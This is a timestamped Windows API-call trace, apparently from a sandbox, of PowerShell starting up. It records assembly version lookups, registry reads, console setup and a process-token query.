	[0447.299] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16dd68, pwszLanguagesBuffer=0x2ccc420, pcchLanguagesBuffer=0x16dd60 | out: pulNumLanguages=0x16dd68, pwszLanguagesBuffer=0x2ccc420, pcchLanguagesBuffer=0x16dd60) returned 1
	[0447.304] CoTaskMemAlloc (cb=0x24) returned 0x25dc00
	[0447.304] GetUserDefaultLocaleName (in: lpLocaleName=0x25dc00, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0447.305] CoTaskMemFree (pv=0x25dc00) 
	[0447.328] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0447.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.329] CoTaskMemFree (pv=0x252be0) 
	[0447.331] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0447.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.331] CoTaskMemFree (pv=0x252be0) 
	[0447.599] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0447.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.599] CoTaskMemFree (pv=0x252be0) 
	[0447.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.607] SetErrorMode (uMode=0x1) returned 0x1
	[0447.607] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16d9e0 | out: lpFileInformation=0x16d9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0447.607] SetErrorMode (uMode=0x1) returned 0x1
	[0447.608] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dc50 | out: lpdwHandle=0x16dc50) returned 0x94c
	[0447.608] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ccfcb0 | out: lpData=0x2ccfcb0) returned 1
	[0447.609] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dbc8, puLen=0x16dbc0 | out: lplpBuffer=0x16dbc8*=0x2ccfd4c, puLen=0x16dbc0) returned 1
	[0447.609] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2ccfe28, puLen=0x16db30) returned 1
	[0447.609] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0447.609] CoTaskMemAlloc (cb=0x2e) returned 0x268360
	[0447.609] lstrcpyW (in: lpString1=0x268360, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0447.609] CoTaskMemFree (pv=0x268360) 
	[0447.609] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2ccfe7c, puLen=0x16db30) returned 1
	[0447.609] lstrlenW (lpString="System.Management.Automation") returned 28
	[0447.609] CoTaskMemAlloc (cb=0x3c) returned 0x2671e0
	[0447.609] lstrcpyW (in: lpString1=0x2671e0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0447.609] CoTaskMemFree (pv=0x2671e0) 
	[0447.609] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2ccfed8, puLen=0x16db30) returned 1
	[0447.609] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0447.609] CoTaskMemAlloc (cb=0x20) returned 0x2642f0
	[0447.609] lstrcpyW (in: lpString1=0x2642f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0447.610] CoTaskMemFree (pv=0x2642f0) 
	[0447.610] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2ccff18, puLen=0x16db30) returned 1
	[0447.610] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0447.610] CoTaskMemAlloc (cb=0x44) returned 0x2671e0
	[0447.610] lstrcpyW (in: lpString1=0x2671e0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0447.610] CoTaskMemFree (pv=0x2671e0) 
	[0447.610] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2ccff80, puLen=0x16db30) returned 1
	[0447.610] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0447.610] CoTaskMemAlloc (cb=0x76) returned 0x2016a0
	[0447.610] lstrcpyW (in: lpString1=0x2016a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0447.610] CoTaskMemFree (pv=0x2016a0) 
	[0447.610] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2cd001c, puLen=0x16db30) returned 1
	[0447.610] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0447.610] CoTaskMemAlloc (cb=0x44) returned 0x2671e0
	[0447.610] lstrcpyW (in: lpString1=0x2671e0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0447.610] CoTaskMemFree (pv=0x2671e0) 
	[0447.610] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2cd0080, puLen=0x16db30) returned 1
	[0447.610] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0447.610] CoTaskMemAlloc (cb=0x58) returned 0x1b9450
	[0447.610] lstrcpyW (in: lpString1=0x1b9450, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0447.610] CoTaskMemFree (pv=0x1b9450) 
	[0447.610] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2cd00fc, puLen=0x16db30) returned 1
	[0447.610] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0447.610] CoTaskMemAlloc (cb=0x20) returned 0x2642f0
	[0447.610] lstrcpyW (in: lpString1=0x2642f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0447.610] CoTaskMemFree (pv=0x2642f0) 
	[0447.610] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2ccfda4, puLen=0x16db30) returned 1
	[0447.610] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0447.610] CoTaskMemAlloc (cb=0x66) returned 0x224e90
	[0447.610] lstrcpyW (in: lpString1=0x224e90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0447.610] CoTaskMemFree (pv=0x224e90) 
	[0447.610] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x0, puLen=0x16db30) returned 0
	[0447.610] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x0, puLen=0x16db30) returned 0
	[0447.611] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x0, puLen=0x16db30) returned 0
	[0447.611] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16db08, puLen=0x16db00 | out: lplpBuffer=0x16db08*=0x2ccfd4c, puLen=0x16db00) returned 1
	[0447.611] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0447.611] VerLanguageNameW (in: wLang=0x0, szLang=0x207ef0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0447.611] CoTaskMemFree (pv=0x207ef0) 
	[0447.611] VerQueryValueW (in: pBlock=0x2ccfcb0, lpSubBlock="\\", lplpBuffer=0x16db58, puLen=0x16db50 | out: lplpBuffer=0x16db58*=0x2ccfcd8, puLen=0x16db50) returned 1
	[0447.618] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0447.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.618] CoTaskMemFree (pv=0x252be0) 
	[0447.620] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0447.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.620] CoTaskMemFree (pv=0x252be0) 
	[0447.623] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da28 | out: phkResult=0x16da28*=0x314) returned 0x0
	[0447.624] RegOpenKeyExW (in: hKey=0x314, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da18 | out: phkResult=0x16da18*=0x318) returned 0x0
	[0447.624] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16daa8 | out: phkResult=0x16daa8*=0x31c) returned 0x0
	[0447.626] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d9ec, lpData=0x0, lpcbData=0x16d9e8*=0x0 | out: lpType=0x16d9ec*=0x1, lpData=0x0, lpcbData=0x16d9e8*=0x56) returned 0x0
	[0447.627] CoTaskMemAlloc (cb=0x5a) returned 0x224e20
	[0447.627] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d9bc, lpData=0x224e20, lpcbData=0x16d9b8*=0x56 | out: lpType=0x16d9bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d9b8*=0x56) returned 0x0
	[0447.627] CoTaskMemFree (pv=0x224e20) 
	[0447.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.562] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0448.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0448.562] CoTaskMemFree (pv=0x252be0) 
	[0449.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0449.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0450.170] CoTaskMemAlloc (cb=0x104) returned 0x252cf0
	[0450.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.171] CoTaskMemFree (pv=0x252cf0) 
	[0450.172] CoTaskMemAlloc (cb=0x104) returned 0x252cf0
	[0450.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.395] CoTaskMemFree (pv=0x252cf0) 
	[0450.420] CoTaskMemAlloc (cb=0x104) returned 0x252cf0
	[0450.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.420] CoTaskMemFree (pv=0x252cf0) 
	[0450.421] CoTaskMemAlloc (cb=0x104) returned 0x252cf0
	[0450.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.421] CoTaskMemFree (pv=0x252cf0) 
	[0450.421] CoTaskMemAlloc (cb=0x104) returned 0x252cf0
	[0450.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.421] CoTaskMemFree (pv=0x252cf0) 
	[0451.031] CoTaskMemAlloc (cb=0x104) returned 0x252cf0
	[0451.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0451.031] CoTaskMemFree (pv=0x252cf0) 
	[0451.034] CoTaskMemAlloc (cb=0x104) returned 0x252cf0
	[0451.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0451.035] CoTaskMemFree (pv=0x252cf0) 
	[0451.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0451.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0453.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0453.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0456.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0456.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0456.359] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0456.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0456.359] CoTaskMemFree (pv=0x252f10) 
	[0456.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0456.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0456.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0456.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0456.925] SetErrorMode (uMode=0x1) returned 0x1
	[0456.925] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16d980 | out: lpFileInformation=0x16d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0456.925] SetErrorMode (uMode=0x1) returned 0x1
	[0459.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0459.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0459.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0459.706] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0459.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.706] CoTaskMemFree (pv=0x252f10) 
	[0459.708] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0459.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.709] CoTaskMemFree (pv=0x252f10) 
	[0459.709] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0459.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.709] CoTaskMemFree (pv=0x252f10) 
	[0459.711] CoCreateGuid (in: pguid=0x16dd48 | out: pguid=0x16dd48*(Data1=0xbc9b0eff, Data2=0xb97d, Data3=0x4feb, Data4=([0]=0xa4, [1]=0xec, [2]=0x87, [3]=0xa7, [4]=0x5b, [5]=0xa, [6]=0x37, [7]=0x2d))) returned 0x0
	[0459.714] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0459.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.714] CoTaskMemFree (pv=0x252f10) 
	[0459.717] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0459.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.717] CoTaskMemFree (pv=0x252f10) 
	[0459.719] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0459.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.719] CoTaskMemFree (pv=0x252f10) 
	[0459.731] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0459.732] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16d9f0 | out: lpConsoleScreenBufferInfo=0x16d9f0) returned 1
	[0459.739] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0459.739] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16d9f0 | out: lpConsoleScreenBufferInfo=0x16d9f0) returned 1
	[0459.740] GetVersionExW (in: lpVersionInformation=0x16d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0459.743] GetCurrentProcess () returned 0xffffffffffffffff
	[0459.744] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16da18 | out: TokenHandle=0x16da18*=0x330) returned 1
	[0459.747] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16d938 | out: TokenInformation=0x0, ReturnLength=0x16d938) returned 0
	[0459.748] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c7310
	[0459.748] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x8, TokenInformation=0x1c7310, TokenInformationLength=0x4, ReturnLength=0x16d938 | out: TokenInformation=0x1c7310, ReturnLength=0x16d938) returned 1
	[0459.748] DuplicateTokenEx (in: hExistingToken=0x330, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16da98 | out: phNewToken=0x16da98*=0x32c) returned 1
